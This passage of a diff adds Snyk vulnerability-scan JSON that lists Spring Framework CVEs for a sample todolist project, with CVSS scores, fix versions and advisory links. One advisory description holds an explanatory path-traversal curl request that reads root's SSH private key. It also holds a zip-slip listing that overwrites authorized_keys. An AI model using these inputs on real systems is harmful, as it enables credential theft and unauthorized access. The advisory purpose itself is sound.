"medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:48:36.610042Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:53:48.086414Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:05:20.847607Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:36.610042Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:48.086414Z" + } + ], + "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Output Neutralization for Logs when a user provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.3.12, 5.2.18 or higher.\n## References\n- [Github Commit](https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22096)\n", + "epssDetails": { + "percentile": "0.34533", + "probability": "0.00079", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-22096" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.springframework:spring-core", + "proprietary": false, + "creationTime": "2022-01-02T11:14:46.053186Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-10-27T12:52:59Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-core" + }, + "publicationTime": "2021-10-27T16:55:13Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:48.086414Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.2.18.RELEASE", + "org.springframework:spring-core@5.2.18.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-core", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2330878", + "title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "psytester" + ], + "semver": { + "vulnerable": [ + "[,5.2.19.RELEASE)", + "[5.3.0,5.3.14)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.19.RELEASE", + "5.3.14" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 4.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-core", + "references": [ + { + "url": "https://pivotal.io/security/cve-2021-22060", + "title": "Pivotal Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:48:34.544783Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:49:10.667113Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:24.703024Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:34.544783Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:10.667113Z" + } + ], + "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Input Validation when a user provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.2.19.RELEASE, 5.3.14 or higher.\n## References\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22060)\n", + "epssDetails": { + "percentile": "0.23203", + "probability": "0.00054", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-22060" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.springframework:spring-core", + "proprietary": false, + "creationTime": "2022-01-06T12:31:26.181234Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-01-06T11:18:34Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-core" + }, + "publicationTime": "2022-01-06T17:17:24.995166Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:10.667113Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.2.19.RELEASE", + "org.springframework:spring-core@5.2.19.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-core", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-31325", + "title": "Directory Traversal", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "credit": [ + "Takeshi Terada" + ], + "semver": { + "vulnerable": [ + "[3.0.0.RELEASE, 3.2.9.RELEASE)", + "[4.0.0.RELEASE, 4.0.5.RELEASE)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "3.2.9.RELEASE", + "4.0.5.RELEASE" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[3.0.0.RELEASE, 3.2.9.RELEASE)", + "[4.0.0.RELEASE, 4.0.5.RELEASE)" + ], + "functionId": { + "filePath": "org/springframework/util/StringUtils.java", + "className": "StringUtils", + "functionName": "cleanPath" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-core", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/16414", + "title": "GitHub Issue" + }, + { + "url": "https://jira.spring.io/browse/SPR-12354", + "title": "Jira Issue" + }, + { + "url": "http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html", + "title": "JVNDB" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578", + "title": "NVD" + }, + { + "url": "https://pivotal.io/security/cve-2014-3578", + "title": "Pivotal Security" + }, + { + "url": "http://www.pivotal.io/security/cve-2014-3578", + "title": "Pivotal Security" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1131882", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:07.314890Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:25.325641Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:46:07.314890Z" + } + ], + "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Directory Traversal. It allows remote attackers to read arbitrary files via a crafted URL.\n\n## Details\n\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\n\nDirectory Traversal vulnerabilities can be generally divided into two types:\n\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\n\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). In our example, we will serve files from the `public` route.\n\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\n\n```\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\n```\n**Note** `%2e` is the URL encoded version of `.` (dot).\n\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \n\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\n\n```\n2018-04-15 22:04:29 ..... 19 19 good.txt\n2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys\n```\n\n## Remediation\nUpgrade `org.springframework:spring-core` to version 3.2.9.RELEASE, 4.0.5.RELEASE or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/16414)\n- [Jira Issue](https://jira.spring.io/browse/SPR-12354)\n- [JVNDB](http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578)\n- [Pivotal Security](https://pivotal.io/security/cve-2014-3578)\n- [Pivotal Security](http://www.pivotal.io/security/cve-2014-3578)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1131882)\n", + "epssDetails": { + "percentile": "0.69801", + "probability": "0.00301", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2014-3578" + ], + "CWE": [ + "CWE-22" + ] + }, + "packageName": "org.springframework:spring-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:31.465000Z", + "functions_new": [ + { + "version": [ + "[3.0.0.RELEASE, 3.2.9.RELEASE)", + "[4.0.0.RELEASE, 4.0.5.RELEASE)" + ], + "functionId": { + "className": "org.springframework.util.StringUtils", + "functionName": "cleanPath" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2014-09-05T17:16:58Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-core" + }, + "publicationTime": "2014-09-05T17:16:58Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:07.314890Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@3.2.9.RELEASE", + "org.springframework:spring-core@3.2.9.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-core", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2434828", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "4ra1n" + ], + "semver": { + "vulnerable": [ + "[,5.2.20.RELEASE)", + "[5.3.0,5.3.17)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.20.RELEASE", + "5.3.17" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using Spring Expression Language (SpEL)" + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-expression", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/28145", + "title": "GitHub Issue" + }, + { + "url": "https://pivotal.io/security/cve-2022-22950", + "title": "Pivotal Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:48:12.598178Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:47.044801Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:01.573408Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:12.598178Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.044801Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) by providing a specially crafted SpEL expression, that might result in an `OutOfMemoryError`.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.20.RELEASE, 5.3.17 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28145)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2022-22950)\n", + "epssDetails": { + "percentile": "0.35300", + "probability": "0.00081", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22950" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.springframework:spring-expression", + "proprietary": false, + "creationTime": "2022-03-29T10:05:31.971026Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-03-29T09:51:43Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-expression" + }, + "publicationTime": "2022-03-29T14:24:08Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.044801Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.0.0.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-expression", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-3369749", + "title": "Allocation of Resources Without Limits or Throttling", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Google OSS-Fuzz team" + ], + "semver": { + "vulnerable": [ + "[,5.2.23.RELEASE)", + "[5.3.0,5.3.26)", + "[6.0.0,6.0.7)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.23.RELEASE", + "5.3.26", + "6.0.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-expression", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5", + "title": "GitHub Commit" + }, + { + "url": "https://spring.io/security/cve-2023-20861", + "title": "Vulnerability Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:04.052825Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:54:00.291695Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:22.626014Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:04.052825Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:00.291695Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via a crafted `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.23.RELEASE, 5.3.26, 6.0.7 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20861)\n", + "epssDetails": { + "percentile": "0.48906", + "probability": "0.00133", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-20861" + ], + "CWE": [ + "CWE-770" + ] + }, + "packageName": "org.springframework:spring-expression", + "proprietary": false, + "creationTime": "2023-03-23T12:26:39.837900Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-03-23T11:49:46Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-expression" + }, + "publicationTime": "2023-03-23T12:37:13.052190Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.291695Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.0.0.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-expression", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-5422217", + "title": "Allocation of Resources Without Limits or Throttling", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Google OSS-Fuzz Team" + ], + "semver": { + "vulnerable": [ + "[,5.2.24.RELEASE)", + "[5.3.0,5.3.27)", + "[6.0.0,6.0.8)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.24.RELEASE", + "5.3.27", + "6.0.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-expression", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f", + "title": "GitHub Commit" + }, + { + "url": "https://spring.io/security/cve-2023-20863", + "title": "Vulnerability Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:09.820460Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:15.433654Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:09.820460Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling when a user provides a very long `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.24.RELEASE, 5.3.27, 6.0.8 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20863)\n", + "epssDetails": { + "percentile": "0.70100", + "probability": "0.00306", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-20863" + ], + "CWE": [ + "CWE-770" + ] + }, + "packageName": "org.springframework:spring-expression", + "proprietary": false, + "creationTime": "2023-04-14T06:33:20.884492Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-04-14T06:25:45Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-expression" + }, + "publicationTime": "2023-04-14T06:33:21.063044Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:09.820460Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.0.0.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-expression", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Rob Ryan" + ], + "semver": { + "vulnerable": [ + "[,5.2.22.RELEASE)", + "[5.3.0,5.3.20)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.22.RELEASE", + "5.3.20" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-beans", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583", + "title": "GitHub Commit" + }, + { + "url": "https://tanzu.vmware.com/security/cve-2022-22970", + "title": "Tanzu vmware" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:47:28.086179Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:49:48.407397Z" + } + ], + 